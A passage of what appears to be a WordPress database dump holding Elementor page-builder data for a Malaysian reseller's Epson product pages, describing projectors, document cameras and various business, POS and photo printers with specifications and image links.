Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9761ce4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"df42bcf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"022ecbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ACCENT LIGHTING LASER PROJECTORS<\\/h3><p>Epson LightScene EV-105<\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6edff95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8eec823\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ae075d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e79162d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7a2bfe2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>INK TANK SYSTEM<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><h3>LASER PRINTER<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><p>2.<\\/p><p>3.\\u00a0<\\/p><h3>POS PRINTER<\\/h3><ol><li>\\u00a0<\\/li><\\/ol><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>\\u00a0<\\/h3><ul><li>\\u00a0<\\/li><\\/ul><p>2.\\u00a03.\\u00a0<\\/p><h1>Projectors for Work<\\/h1><p>Epson has the best projector for your business, from education solutions to conference room projectors.<\\/p><h3>\\u00a0<\\/h3><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>\\u00a0<\\/h3><h3>ULTRA PORTABLE<\\/h3><ol><li>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/li><\\/ol><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><h3>INTERACTIVE<\\/h3><ol><li>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/li><\\/ol><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><p>2.\\u00a0Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><h3>HIGH BRIGHTNESS<\\/h3><ol><li>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/li><\\/ol><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><p>2.\\u00a0Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><p>3.\\u00a0Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><h3>DOCUMENT CAMERAS<\\/h3><ol><li>Document Camera ELPDC21\\u00a0<img class=\\\"alignnone wp-image-2444\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/li><\\/ol><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3935,2748,'_elementor_version','0.4'),(3945,2750,'_wp_page_template','template-fullwidth.php'),(3946,2750,'_elementor_edit_mode','builder'),(3947,2750,'_elementor_template_type','post'),(3948,2750,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Enterprise WF-C17590\\u00a0<img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Pro WF-C5290\\u00a0<img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-100\\u00a0<img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-7711\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EcoTank L3150\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L120 Printer\\u00a0<img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson M1100 Printer\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson AcuLaser C9300N\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0Epson WorkForce AL-M320DN\\u00a0<img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce AL-M8100DN\\u00a0<img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-H6000IV\\u00a0<img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T88V-i\\u00a0<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T70II\\u00a0<img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L1800 A3 Photo Ink Tank Printer<\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L850 Printer\\u00a0<img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes 